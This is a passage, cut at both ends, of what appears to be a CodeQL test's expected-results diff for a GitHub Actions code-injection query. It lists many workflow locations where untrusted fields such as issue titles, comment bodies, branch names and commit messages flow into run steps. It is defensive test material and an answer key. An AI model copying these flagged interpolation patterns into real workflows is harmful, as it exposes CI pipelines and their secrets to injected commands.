steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | 